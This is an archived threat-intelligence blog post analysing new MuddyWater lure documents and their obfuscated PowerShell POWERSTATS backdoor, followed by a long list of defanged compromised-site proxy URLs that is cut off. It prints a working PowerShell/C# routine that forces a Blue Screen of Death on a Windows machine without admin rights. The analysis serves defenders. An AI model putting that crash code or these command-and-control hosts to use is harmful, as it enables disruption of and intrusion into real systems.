{ "id": "49528bdf-d9a6-4470-b1f5-c123fe0d666b", "created_at": "2026-04-06T00:08:59.318915Z", "updated_at": "2026-04-10T03:34:22.6244Z", "deleted_at": null, "sha1_hash": "3ba6037dd03e2b92eae5ec5b7818723d13db4a5e", "title": "Clearing the MuddyWater - Analysis of new MuddyWater Samples", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 101022, "plain_text": "Clearing the MuddyWater - Analysis of new MuddyWater Samples\r\nBy Mo Bustami\r\nPublished: 2018-05-08 · Archived: 2026-04-05 23:37:00 UTC\r\nIt has been over 2 months since I last wrote about MuddyWater or Temp.Zagros as named by FireEye. To be\r\nhonest, I felt they were going quiet for a while; but boy was I wrong. Starting this week I have picked up some\r\nnew interesting samples. Although these new samples have lots of similarities with the ones from earlier in the\r\nyear, there are still some interesting aspects and additional, you guessed it, obfuscation used in the new samples.\r\nTheir heavy focus on layered obfuscation and preference for PowerShell is still apparent. However, I will\r\nhighlight what changed based on the samples that I have analyzed.\r\nBelow are screenshots of some of the recent lure documents used by this group. All Hashes are at the end of the\r\nblog.\r\nYou can see from the above screenshots that their targeting seem to continue to focus on the Middle East Region\r\n(Turkey and Iraq) and Pakistan. As mentioned in my previous blogs, these lures can give us an idea of the\r\norganizations and industries that might have been targeted by this wave.\r\nThe timeline of these lures based on VT submission dates seems to be from Mid Feb all the way to the most recent\r\nsample dated May 6, 2018 which I will be focusing on. The sample has the name \"mofa.gov.iq.doc\" -\r\n 94625dd8151814dd6186735a6a6a87b2a4c71c04b8402caf314fb6f98434eaad. MOFA of course stands for\r\nMinistry of Foreign Affairs.\r\nI will be analyzing the sample in detail this time. I will only highlight any new/modified aspects from the\r\nobfuscation used or any additional functionality in the POWERSTATS backdoor.\r\nThe document contains a Macro code with multiple Base64 encoded segments as shown below\r\nOnce you decode the Javascript that is embedded in the XML file you will be presented with the below\r\nThe decoded script is in fact a PowerShell script that is performing further decoding routine on a file called\r\n\"C:\\\\\\\\ProgramData\\\\\\\\WindowsDefenderService.ini\".\r\nThe content of this file is actually the encoded data from the first Base64 chunk. Once decoded, the content looks\r\nfamiliar as it is indeed a variant of the POWERSTATS backdoor. Lets go through a couple of the\r\nobfuscation layers used in this variant.\r\nAlthough it looks messy, it does look familiar; The character substitution functions and the character\r\nreplacements. We are getting closer. You can notice in the image above the \"\u0026((vaRIABle\r\n'*MDR*').NAME[3,11,2]-jOiN'')\". This in fact is Invoke-Expression just obfuscated. This means we can replace it\r\nwith Write-Output as well. and the result script is something that looks like this\r\nAgain, you can notice the use of \"( $enV:ComSpEc[4,24,25]-jOiN'')\" which is iex. Meaning we can replace it\r\nagain with Write-Output.\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 1 of 18\n\nThis circle of obfuscation keeps going on until we reach the decoded script which we are familiar with including\r\nthe Proxy URLs and the IP identification as shown below\r\nThis, of course is just one part of the big encoded PS script. The second and third part are the actual functionality\r\nof the Backdoor.\r\nMost of the functionality that I described in my last blog still exists with the new variants. However, there are\r\nsome new additions and some modifications on the code:\r\nScreenshot function is re-written however the same purpose remains. It takes a screenshot of the victim's\r\nscreen, saves it as PNG, converts it to bytes, encodes it with Base64 and then uploads it to the C\u0026C.\r\nInclusion of a Blue Screen of Death or BSOD code in case a certain process is found. This part of anti-debugging and anti-analysis technique\r\nThe function highlighted at the bottom of the picture \"GDKZVLJXGAPYNUGCPJNPGZQPOLPPBG\" leads to a\r\npiece of code:\r\n function GDKZVLJXGAPYNUGCPJNPGZQPOLPPBG(){\r\n$s = @\"\r\nusing System;\r\nusing System.Runtime.InteropServices;\r\npublic static class C{\r\n[DllImport(\"ntdll.dll\")]\r\npublic static extern uint RtlAdjustPrivilege(int Privilege, bool bEnablePrivilege, bool IsThreadPrivilege, out bool\r\nPreviousValue);\r\n[DllImport(\"ntdll.dll\")]\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 2 of 18\n\npublic static extern uint NtRaiseHardError(uint ErrorStatus, uint NumberOfParameters, uint\r\nUnicodeStringParameterMask, IntPtr Parameters, uint ValidResponseOption, out uint Response);\r\npublic static unsafe void Kill(){\r\nBoolean tmp1;\r\nuint tmp2;\r\nRtlAdjustPrivilege(19, true, false, out tmp1);\r\nNtRaiseHardError(0xc0000022, 0, 0, IntPtr.Zero, 6, out tmp2);\r\n}\r\n}\r\n\"@\r\n$c = new-object -typename system.CodeDom.Compiler.CompilerParameters\r\n$c.CompilerOptions = '/unsafe'\r\n$a = Add-Type -TypeDefinition $s -Language CSharp -PassThru -CompilerParameters $c\r\n[C]::Kill()\r\n}\r\nThis is an exact copy of Invoke-BSOD code that was created by Barrett Adams (@peewpw) about a month ago\r\nand is available on his GitHub page. One thing to note is that this code can BSOD a machine without the need for\r\nadmin privileges as described by the author.\r\nThe same function and code is also used if processes that include \"cmd.exe, PowerShell.exe or\r\nPowershell_ISE.exe\" exist on the vicitm system.\r\nThere is also a function that is looking for the following strings within ProgramData folder - \"Kasper,\r\nPanda and ESET\". If found, then the screenshot functionality and upload function will break.\r\nhxxp://alessandrofoglino[.]com//wp-config-ini.php\r\nhxxps://www.theharith[.]com/wp-includes/wp-config-ini.php\r\nhxxp://www.easy-home-sales[.]co.za//wp-config-ini.php\r\nhxxps://amishcountryfurnishings[.]com/awstats/wp-config-ini.php\r\nhxxp://chinamall[.]co.za//wp-config-ini.php\r\nhxxp://themotoringcalendar[.]co.za//wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 3 of 18\n\nhxxp://bluehawkbeats[.]com//wp-config-ini.php\r\nhxxp://www.gilforsenate[.]com//wp-config-ini.php\r\nhxxp://answerstoprayer[.]org//wp-config-ini.php\r\nhxxp://mgamule[.]co.za/oldweb/wp-config-ini.php\r\nhxxp://chrisdejager-attorneys[.]co.za//wp-config-ini.php\r\nhxxp://finalnewstv[.]com//wp-config-ini.php\r\nhxxps://www.brand-stories.gr//wp-config-ini.php\r\nhxxp://www.duotonedigital[.]co.za//wp-config-ini.php\r\nhxxp://www.britishasia-equip[.]co.uk//wp-config-ini.php\r\nhxxp://www.tanati[.]co.za//wp-config-ini.php\r\nhxxp://emware[.]co.za//wp-config-ini.php\r\nhxxp://breastfeedingbra[.]co.za//wp-config-ini.php\r\nhxxp://www.androidwikihow[.]com//wp-config-ini.php\r\nhxxp://cashforyousa[.]co.za//wp-config-ini.php\r\nhxxp://hesterwebber[.]co.za//wp-config-ini.php\r\nhxxp://bramloosveld.be/trainer/wp-config-ini.php\r\nhxxp://fickstarelectrical[.]co.za//wp-config-ini.php\r\nhxxp://buchnation[.]com//wp-config-ini.php\r\nhxxp://hostingvalley[.]co.uk/downloads/wp-config-ini.php\r\nhxxp://bluefor[.]com/magento/wp-config-ini.php\r\nhxxp://foryou.guru/css/wp-config-ini.php\r\nhxxp://www.daleth[.]co.za//wp-config-ini.php\r\nhxxps://www.buyandenjoy.pk//wp-config-ini.php\r\nhxxps://annodle[.]com/wp-includes/wp-config-ini.php\r\nhxxp://goldeninstitute[.]co.za/contents/wp-config-ini.php\r\nhxxp://advss[.]co.za/images/wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 4 of 18\n\nhxxp://ednpk[.]com//wp-config-ini.php\r\nhxxp://proeventsports[.]co.za/wp-admin/wp-config-ini.php\r\nhxxp://glenbridge[.]co.za//wp-config-ini.php\r\nhxxp://berped[.]co.za//wp-config-ini.php\r\nhxxp://best-digital-slr-cameras[.]com//wp-config-ini.php\r\nhxxps://kamas.pk//wp-config-ini.php\r\nhxxps://bekkersweldingservice.nl//wp-config-ini.php\r\nhxxp://bogdanandreescu.fit//wp-config-ini.php\r\nhxxp://www.bashancorp[.]co.za//wp-config-ini.php\r\nhxxps://www.bmcars.nl/wp-admin/wp-config-ini.php\r\nhxxp://visionclinic[.]co.ls/visionclinic/wp-config-ini.php\r\nhxxps://www.antojoentucocina[.]com//wp-config-ini.php\r\nhxxp://www.ihlosiqs-pm[.]co.za//wp-config-ini.php\r\nhxxp://capitalradiopetition[.]co.za//wp-config-ini.php\r\nhxxp://www.generictoners[.]co.za//wp-config-ini.php\r\nhxxp://almaqsd[.]com/wp-includes/wp-config-ini.php\r\nhxxp://www.alessioborzuola[.]com/downloads/wp-config-ini.php\r\nhxxp://briskid[.]com//wp-config-ini.php\r\nhxxp://bios-chip[.]co.za//wp-config-ini.php\r\nhxxp://www.crissamconsulting[.]co.za//wp-config-ini.php\r\nhxxp://capriflower[.]co.za//wp-config-ini.php\r\nhxxp://www.dingaanassociates[.]co.za//wp-config-ini.php\r\nhxxp://batistadopovosjc[.]org.br//wp-config-ini.php\r\nhxxp://indiba-africa[.]co.za//wp-config-ini.php\r\nhxxp://apollonweb[.]com//wp-config-ini.php\r\nhxxps://www.amighini.it/webservice/wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 5 of 18\n\nhxxp://blackrabbitthailand[.]com//wp-config-ini.php\r\nhxxp://batthiqbal[.]com/sagenda/webroot/wp-config-ini.php\r\nhxxp://clandecor[.]co.za/rvsUtf8Backup/wp-config-ini.php\r\nhxxp://bakron[.]co.za//wp-config-ini.php\r\nhxxp://gsnconsulting[.]co.za//wp-config-ini.php\r\nhxxp://vumavaluations[.]co.za//wp-config-ini.php\r\nhxxp://heritagetravelmw[.]com//wp-config-ini.php\r\nhxxp://www.moboradar[.]com/wp-includes/wp-config-ini.php\r\nhxxps://news9pakistan[.]com/wp-includes/wp-config-ini.php\r\nhxxp://havilahglo[.]co.za/wpscripts/wp-config-ini.php\r\nhxxp://binaries.site/wink/wp-config-ini.php\r\nhxxp://www.bestdecorativemirrors[.]com/More-Mirrors/wp-config-ini.php\r\nhxxp://clouditzone[.]com/revolution/assets/wp-config-ini.php\r\nhxxp://delectronics[.]com.pk//wp-config-ini.php\r\nhxxps://boudua[.]com//wp-config-ini.php\r\nhxxp://baynetins[.]com//wp-config-ini.php\r\nhxxp://insafradio.pk/pos/wp-config-ini.php\r\nhxxp://www.harmonyguesthouse[.]co.za//wp-config-ini.php\r\nhxxp://fsproperties[.]co.za/engine1/wp-config-ini.php\r\nhxxp://desirablehair[.]co.za//wp-config-ini.php\r\nhxxp://comsip[.]org.mw//wp-config-ini.php\r\nhxxp://www.wbdrivingschool[.]com//wp-config-ini.php\r\nhxxp://jdcorporate[.]co.za/catalog/wp-config-ini.php\r\nhxxp://bradleysherrer[.]com/wp/wp-config-ini.php\r\nhxxp://debnoch[.]com/image/wp-config-ini.php\r\nhxxp://adsbook[.]co.za//wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 6 of 18\n\nhxxp://host4unix.net/host24new/wp-config-ini.php\r\nhxxp://jvpsfunerals[.]co.za//wp-config-ini.php\r\nhxxp://immaculatepainters[.]co.za//wp-config-ini.php\r\nhxxp://tcpbereka[.]co.za/js/wp-config-ini.php\r\nhxxp://investaholdings[.]co.za/htc/wp-config-ini.php\r\nhxxp://tuules[.]com//wp-config-ini.php\r\nhxxp://findinfo-more[.]com//wp-config-ini.php\r\nhxxp://bmorecleaning[.]com//wp-config-ini.php\r\nhxxp://www.goolineb2b[.]com//wp-config-ini.php\r\nhxxp://www.triconfabrication[.]com/wp-includes/wp-config-ini.php\r\nhxxp://irshadfoundation[.]co.za//wp-config-ini.php\r\nhxxp://www.blattoamsterdam[.]com//wp-config-ini.php\r\nhxxp://ladiescircle[.]co.za//wp-config-ini.php\r\nhxxp://domesticguardians[.]co.za/Banner/wp-config-ini.php\r\nhxxp://jhphotoedits[.]co.za//wp-config-ini.php\r\nhxxp://iqra[.]co.za/pub/wp-config-ini.php\r\nhxxps://bestbedrails.reviews//wp-config-ini.php\r\nhxxp://www.banditrockradio[.]com//wp-config-ini.php\r\nhxxp://burgercoetzeeattorneys[.]co.za//wp-config-ini.php\r\nhxxp://burgeystikihut[.]com//wp-config-ini.php\r\nhxxp://alphaobring[.]com//wp-config-ini.php\r\nhxxp://www.galwayprimary[.]co.za//wp-config-ini.php\r\nhxxps://lahorewholesalemarket[.]com//wp-config-ini.php\r\nhxxp://bitandbyte62[.]com/faibrescia/wp-config-ini.php\r\nhxxp://www.bioforgehealth[.]org//wp-config-ini.php\r\nhxxp://www.brianzashop.it//wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 7 of 18\n\nhxxp://geetransfers[.]co.za/font-awesome/wp-config-ini.php\r\nhxxps://www.blubaytrading[.]com//wp-config-ini.php\r\nhxxp://carlagrobler[.]co.za/components/wp-config-ini.php\r\nhxxp://btfila[.]org/wp-includes/wp-config-ini.php\r\nhxxp://lensofafrica[.]co.za//wp-config-ini.php\r\nhxxp://greenacrestf[.]co.za/video/wp-config-ini.php\r\nhxxp://www.tonaro[.]co.za//wp-config-ini.php\r\nhxxp://www.amphibiblechurch[.]com/wp-admin/wp-config-ini.php\r\nhxxp://bumpapps[.]com/apps/wp-config-ini.php\r\nhxxp://ambiances-toiles.fr//wp-config-ini.php\r\nhxxp://dailyqadamat[.]com//wp-config-ini.php\r\nhxxp://tophillsports[.]com//wp-config-ini.php\r\nhxxp://chrishanicdc[.]org/wpimages/wp-config-ini.php\r\nhxxp://architectsinc.net/mail/wp-config-ini.php\r\nhxxp://www.ieced[.]com.pk//wp-config-ini.php\r\nhxxp://entracorntrading[.]co.za//wp-config-ini.php\r\nhxxps://www.besman.de//wp-config-ini.php\r\nhxxp://chickenandkitchen[.]com//wp-config-ini.php\r\nhxxps://www.hosthof[.]com//wp-config-ini.php\r\nhxxp://signsoftime[.]co.za//wp-config-ini.php\r\nhxxp://www.be-indigene.be//wp-config-ini.php\r\nhxxp://absfinancialplanning[.]co.za/images/wp-config-ini.php\r\nhxxp://charispaarl[.]co.za//wp-config-ini.php\r\nhxxp://indlovusecurity[.]co.za//wp-config-ini.php\r\nhxxp://elemech[.]com.pk//wp-config-ini.php\r\nhxxp://bafflethink[.]com/administrator/wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 8 of 18\n\nhxxp://luxconprojects[.]co.za//wp-config-ini.php\r\nhxxp://brandr.ge//wp-config-ini.php\r\nhxxps://www.amateurastronomy[.]org//wp-config-ini.php\r\nhxxp://comfortex[.]co.za/php/wp-config-ini.php\r\nhxxp://deepgraphics[.]co.za//wp-config-ini.php\r\nhxxps://iconicciti[.]com//wp-config-ini.php\r\nhxxp://www.bazookagames.net//wp-config-ini.php\r\nhxxp://sefikengfarm[.]co.ls//wp-config-ini.php\r\nhxxp://passright[.]co.za//wp-config-ini.php\r\nhxxp://aboutduvetcovers[.]com//wp-config-ini.php\r\nhxxp://seismicfactory[.]co.za//wp-config-ini.php\r\nhxxp://abadleabantu[.]co.za//wp-config-ini.php\r\nhxxp://www.gooline.net//wp-config-ini.php\r\nhxxp://bookdoctormeeting[.]com//wp-config-ini.php\r\nhxxps://aquabsafe[.]com//wp-config-ini.php\r\nhxxp://amatikulutours[.]com/tmp/wp-config-ini.php\r\nhxxp://alemaohost[.]com/meniskoumantareas.gr/public_html/tmp/wp-config-ini.php\r\nhxxp://archersassociationofamerica[.]org//wp-config-ini.php\r\nhxxps://www.baossdigital[.]com/wp-includes/wp-config-ini.php\r\nhxxp://rightwayfoundationpk[.]org/wp-admin/wp-config-ini.php\r\nhxxp://bmasokaprojects[.]co.za//wp-config-ini.php\r\nhxxp://itengineering[.]co.za/gatewaydiamond/wp-config-ini.php\r\nhxxp://globalelectricalandconstruction[.]co.za/wpscripts/wp-config-ini.php\r\nhxxp://adriaanvorster[.]co.za//wp-config-ini.php\r\nhxxps://www.boutiquesxxx[.]com//wp-config-ini.php\r\nhxxp://buildingstandards[.]com.pk//wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 9 of 18\n\nhxxp://jakobieducation[.]co.za//wp-config-ini.php\r\nhxxp://breakoutmonitor.info//wp-config-ini.php\r\nhxxps://besttweezers.reviews//wp-config-ini.php\r\nhxxp://ldams[.]org.ls/supplies/wp-config-ini.php\r\nhxxp://menaboracks[.]co.za/tmp/wp-config-ini.php\r\nhxxp://fourseasonscaterersdecorators[.]com//wp-config-ini.php\r\nhxxp://capetownway[.]co.za//wp-config-ini.php\r\nhxxp://hartenboswaterpark[.]co.za/templates/wp-config-ini.php\r\nhxxp://fccorp[.]co.za/php/wp-config-ini.php\r\nhxxp://angar68[.]com//wp-config-ini.php\r\nhxxp://www.bestarticlespinnerr[.]com/wp-admin/wp-config-ini.php\r\nhxxp://serversvalley[.]com//wp-config-ini.php\r\nhxxp://breakbyte[.]com//wp-config-ini.php\r\nhxxps://www.logicsfort[.]com//wp-config-ini.php\r\nhxxp://blackwolfco[.]com//wp-config-ini.php\r\nhxxp://www.exomi.es/wp-admin/wp-config-ini.php\r\nhxxp://verifiedseller[.]co.za/js/wp-config-ini.php\r\nhxxps://www.bolagsregistrering.eu//wp-config-ini.php\r\nhxxp://cdxtrading[.]co.za//wp-config-ini.php\r\nhxxp://aahung[.]org//wp-config-ini.php\r\nhxxps://rstextilesourcing[.]com//wp-config-ini.php\r\nhxxps://bravori[.]com//wp-config-ini.php\r\nhxxp://buboobioinnovations[.]co.za/wpimages/wp-config-ini.php\r\nhxxp://www.advcadsys[.]com//wp-config-ini.php\r\nhxxp://isibaniedu[.]co.za/admin/wp-config-ini.php\r\nhxxp://dianakleyn[.]co.za/layouts/wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 10 of 18\n\nhxxp://amesoulcoaching[.]com/wp-admin/wp-config-ini.php\r\nhxxp://www.loansonhomes[.]co.za//wp-config-ini.php\r\nhxxp://empowerbridge[.]com/projects/abianasystem/wp-config-ini.php\r\nhxxp://alfredocifuentes[.]com//wp-config-ini.php\r\nhxxp://www.gooline.pk//wp-config-ini.php\r\nhxxp://highschoolsuperstar[.]co.za/files/wp-config-ini.php\r\nhxxps://bogjerlow[.]com/project/wp-config-ini.php\r\nhxxp://cafawelding[.]co.za/font-awesome/wp-config-ini.php\r\nhxxp://apalawyers.pt//wp-config-ini.php\r\nhxxp://www.edesignz[.]co.za//wp-config-ini.php\r\nhxxp://centuryacademy[.]co.za/css/wp-config-ini.php\r\nhxxp://buenasia[.]com/wp-includes/wp-config-ini.php\r\nhxxp://ceramica[.]co.za//wp-config-ini.php\r\nhxxp://banjo.la//wp-config-ini.php\r\nhxxp://www.alfredoposada[.]com//wp-config-ini.php\r\nhxxp://allisonplumbing[.]com//wp-config-ini.php\r\nhxxp://eastrandmotorlab[.]co.za/fleet/wp-config-ini.php\r\nhxxp://www.mikimaths[.]com//wp-config-ini.php\r\nhxxp://hjb-racing[.]co.za/htdocs/wp-config-ini.php\r\nhxxp://welcomecaters[.]com//wp-config-ini.php\r\nhxxp://www.andreabelfi[.]com//wp-config-ini.php\r\nhxxp://www.iancullen[.]co.za//wp-config-ini.php\r\nhxxp://jeanetteproperties[.]co.za//wp-config-ini.php\r\nhxxps://www.bridgestobodhi[.]org//wp-config-ini.php\r\nhxxp://www.rejoicetheatre[.]com//wp-config-ini.php\r\nhxxps://alterwebhost[.]com//wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 11 of 18\n\nhxxp://dpscdgkhan.edu.pk/shopping/wp-config-ini.php\r\nhxxp://edgeforensic[.]co.za//wp-config-ini.php\r\nhxxp://willpowerpos[.]co.za//wp-config-ini.php\r\nhxxp://colenesphotography[.]co.za/modules/wp-config-ini.php\r\nhxxp://bfval[.]com/tmp/wp-config-ini.php\r\nhxxps://aliart.nl//wp-config-ini.php\r\nhxxps://bosacik.sk//wp-config-ini.php\r\nhxxp://mailingservers.net//wp-config-ini.php\r\nhxxp://fbrvolume[.]co.za//wp-config-ini.php\r\nhxxp://9newshd[.]com//wp-config-ini.php\r\nhxxp://bartabee[.]com//wp-config-ini.php\r\nhxxp://www.khotsonglodge[.]co.ls//wp-config-ini.php\r\nhxxp://erniecommunications[.]co.za/js/wp-config-ini.php\r\nhxxp://promechtransport[.]co.za/scripts/wp-config-ini.php\r\nhxxp://centuriongsd[.]co.za//wp-config-ini.php\r\nhxxp://delcom[.]co.za//wp-config-ini.php\r\nhxxp://www.andrebruton[.]com//wp-config-ini.php\r\nhxxp://h-dubepromotions[.]co.za//wp-config-ini.php\r\nhxxps://bestcoolingtowels.reviews//wp-config-ini.php\r\nhxxp://crystaltidings[.]co.za//wp-config-ini.php\r\nhxxp://diegemmerkat[.]co.za//wp-config-ini.php\r\nhxxp://funisalodge[.]co.za/data1/wp-config-ini.php\r\nhxxp://www.hfhl[.]org.ls/habitat/wp-config-ini.php\r\nhxxp://experttutors[.]co.za//wp-config-ini.php\r\nhxxps://www.cartridgecave[.]co.za//wp-config-ini.php\r\nhxxp://ecs-consult[.]com//wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 12 of 18\n\nhxxp://oftheearthphotography[.]com/www/wp-config-ini.php\r\nhxxp://hmholdings360[.]co.za//wp-config-ini.php\r\nhxxp://joyngroup[.]com//wp-config-ini.php\r\nhxxp://www.bertflierdesign.nl//wp-config-ini.php\r\nhxxp://seoinlahorepakistan[.]com/clockwork/wp-config-ini.php\r\nhxxp://africanpixels.zar.cc//wp-config-ini.php\r\nhxxp://cazochem[.]co.za/cazochem/wp-config-ini.php\r\nhxxp://ryanchristiefurniture[.]co.za//wp-config-ini.php\r\nhxxp://evansmokaba[.]com/evansmokaba[.]com/thabiso/wp-config-ini.php\r\nhxxp://arabsdeals[.]com//wp-config-ini.php\r\nhxxp://www.fun4kidz[.]co.za//wp-config-ini.php\r\nhxxp://www.infratechconsulting[.]com//wp-config-ini.php\r\nhxxp://courtesydriving[.]co.za/js/wp-config-ini.php\r\nhxxp://bluecrome[.]com//wp-config-ini.php\r\nhxxp://charliewestsecurity[.]co.za//wp-config-ini.php\r\nhxxps://buildyoursalon[.]com/wp-includes/wp-config-ini.php\r\nhxxp://beehiveholdingszar[.]co.za//wp-config-ini.php\r\nhxxp://servicebox[.]co.za//wp-config-ini.php\r\nhxxp://www.malboer[.]co.za/trendy1/wp-config-ini.php\r\nhxxp://biondi[.]co//wp-config-ini.php\r\nhxxp://funeralbusinesssolution[.]com/email_template/wp-config-ini.php\r\nhxxp://ushostinc[.]com/ioncube/wp-config-ini.php\r\nhxxps://alceharfield[.]com//wp-config-ini.php\r\nhxxp://indocraft[.]co.za/test/wp-config-ini.php\r\nhxxp://www.londonbeautyclinic.pk/wp-includes/wp-config-ini.php\r\nhxxp://sullivanprimary[.]co.za//wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 13 of 18\n\nhxxp://btg4hope[.]org//wp-config-ini.php\r\nhxxp://bo-crm[.]com/corel[.]com.bo/wp-config-ini.php\r\nhxxp://abvsecurity[.]co.za//wp-config-ini.php\r\nhxxp://cambridgetuts[.]com//wp-config-ini.php\r\nhxxps://bestaxi.nl//wp-config-ini.php\r\nhxxp://jwseshowe[.]co.za/assets/wp-config-ini.php\r\nhxxp://winagainstebola[.]com//wp-config-ini.php\r\nhxxp://anubandh.in//wp-config-ini.php\r\nhxxps://bgadvocaten.nl/wp-admin/wp-config-ini.php\r\nhxxp://freeskl[.]com/sports/wp-config-ini.php\r\nhxxp://www.abies[.]co.za//wp-config-ini.php\r\nhxxps://www.applecartng[.]com//wp-config-ini.php\r\nhxxps://bakayokocpa[.]com/wp-includes/wp-config-ini.php\r\nhxxp://www.paktechinfo[.]com/wp-includes/wp-config-ini.php\r\nhxxp://www.ariehandomri[.]com//wp-config-ini.php\r\nhxxp://lahorecoolingtower[.]com//wp-config-ini.php\r\nhxxps://boatwif[.]co.uk//wp-config-ini.php\r\nhxxp://gideonitesprojects[.]com//wp-config-ini.php\r\nhxxp://www.koshcreative[.]co.uk/wp-includes/wp-config-ini.php\r\nhxxp://iinvest4u[.]co.za//wp-config-ini.php\r\nhxxps://blankwebagency[.]com/components/wp-config-ini.php\r\nhxxp://hybridauto[.]co.za/photography/wp-config-ini.php\r\nhxxp://h-u-i[.]co.za/heiren/wp-config-ini.php\r\nhxxp://insta-art[.]co.za//wp-config-ini.php\r\nhxxp://abanganifunerals[.]co.za//wp-config-ini.php\r\nhxxp://muallematsela[.]com//wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 14 of 18\n\nhxxps://arhiepiscopiabucurestilor.ro/templates/wp-config-ini.php\r\nhxxp://perfectlabels.net//wp-config-ini.php\r\nhxxps://www.alvarezarquitectos[.]com//wp-config-ini.php\r\nhxxp://boardaffairs[.]com//wp-config-ini.php\r\nhxxp://www.m-3[.]co.za//wp-config-ini.php\r\nhxxp://beesrenovations[.]co.za/images/wp-config-ini.php\r\nhxxp://bumbledyne[.]com/domainmod/wp-config-ini.php\r\nhxxps://blockchainadvertisements.net//wp-config-ini.php\r\nhxxp://mokorotlocorporate[.]com//wp-config-ini.php\r\nhxxp://alchimiegrafiche.net/bbdelteatro/wp-config-ini.php\r\nhxxps://bentivegna.es//wp-config-ini.php\r\nhxxp://in2accounting[.]co.za//wp-config-ini.php\r\nhxxp://capewindstrading[.]co.za//wp-config-ini.php\r\nhxxp://bonus.rocks//wp-config-ini.php\r\nhxxp://cloudhub[.]co.ls/modules/wp-config-ini.php\r\nhxxp://bansko-furniture[.]co.uk//wp-config-ini.php\r\nhxxp://digital-cameras-south-africa[.]co.za/script/wp-config-ini.php\r\nhxxp://ahmadhasanat[.]com//wp-config-ini.php\r\nhxxp://hosthof.pk/customer/wp-config-ini.php\r\nhxxps://www.engeltjieakademie[.]co.za//wp-config-ini.php\r\nhxxp://juniorad[.]co.za/vendor/wp-config-ini.php\r\nhxxp://www.dws-gov[.]co.za//wp-config-ini.php\r\nhxxp://www.getcord[.]co.za//wp-config-ini.php\r\nhxxps://brokedudepodcast[.]com//wp-config-ini.php\r\nhxxp://balaateen[.]co.za/less/wp-config-ini.php\r\nhxxp://2strongmagazine[.]co.za//wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 15 of 18\n\nhxxp://bntlaminates[.]com//wp-config-ini.php\r\nhxxp://embali[.]co.za//wp-config-ini.php\r\nhxxp://beadbazaar[.]com.au/assets/css/wp-config-ini.php\r\nhxxp://www.centreforgovernance.uk//wp-config-ini.php\r\nhxxp://www.icsswaziland[.]com//wp-config-ini.php\r\nhxxps://bulinvestconsult[.]com//wp-config-ini.php\r\nhxxp://www.bhsmusic.net//wp-config-ini.php\r\nhxxp://fragranceoil[.]co.za//wp-config-ini.php\r\nhxxp://gvs[.]com.pk/font-awesome/wp-config-ini.php\r\nhxxp://billielaw[.]com//wp-config-ini.php\r\nhxxp://bagadesign.pt//wp-config-ini.php\r\nhxxp://bahaykuboeliterealty[.]com.au//wp-config-ini.php\r\nhxxp://haveytv[.]com//wp-config-ini.php\r\nhxxp://www.animationinisrael[.]org/tmp_images/wp-config-ini.php\r\nhxxp://www.buhlebayoacademy[.]com//wp-config-ini.php\r\nhxxp://aexergy[.]com//wp-config-ini.php\r\nhxxps://best-dreams[.]com//wp-config-ini.php\r\nhxxp://blackthorn[.]co.za//wp-config-ini.php\r\nhxxp://getabletravel[.]co.za/wpscripts/wp-config-ini.php\r\nhxxp://www.amazingtour.pk//wp-config-ini.php\r\nhxxp://printernet[.]co.za//wp-config-ini.php\r\nhxxp://genesisbs[.]co.za//wp-config-ini.php\r\nhxxp://cybercraft.biz/dist/wp-config-ini.php\r\nhxxps://www.bcppro[.]com//wp-config-ini.php\r\nhxxp://allsporthealthandfitness[.]com//wp-config-ini.php\r\nhxxp://www[.]competitiveedoptions[.]com//wp-config-ini.php\r\nhttps://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html\r\nPage 16 of 18\n\nhxxp://www.humorcarbons[.]com//wp-config-ini.php\r\nhxxp://intelligentprotection[.]co.za//wp-config-ini.php\r\nhxxp://lppaportal[.]org.ls//wp-config-ini.php\r\nhxxp://incoso[.]co.za/images/wp-config-ini.php\r\nhxxp://webhostinc.net//wp-config-ini.php\r\nhxxp://bitteeth[.]com/docbank/wp-config-ini.php\r\nhxxp://mukhtarfeeds[.]com//wp-config-ini.php\r\nhxxp://isound[.]co.za//wp-config-ini.php\r\nhxxp://www.acer-parts[.]co.za//wp-config-ini.php\r\nhxxp://www.gsmmid[.]com//wp-config-ini.php\r\nhxxp://24newstube[.]com//wp-config-ini.php\r\nhxxp://goolinegaming[.]com//wp-config-ini.php\r\nhxxp://hisandherskennels[.]co.za/php/wp-config-ini.php\r\nhxxp://cmhts[.]co.za/resources/wp-config-ini.php\r\nhxxp://glgroup[.]co.za/images/wp-config-ini.php\r\nhxxp://thecompasssolutions[.]co.za//wp-config-ini.php\r\nhxxp://iggleconsulting[.]com//wp-config-ini.php\r\nhxxps://anotherdayinparadise.ca//wp-config-ini.php\r\nhxxp://cupboardcure[.]co.za/vendor/wp-config-ini.php\r\nhxxp://all2wedding[.]com/wp-includes/wp-config-ini.php\r\nhxxp://allianz[.]com.pe//wp-config-ini.php\r\nhxxps://bednbreakfasthotel[.]com//wp-config-ini.php\r\nhxxp://br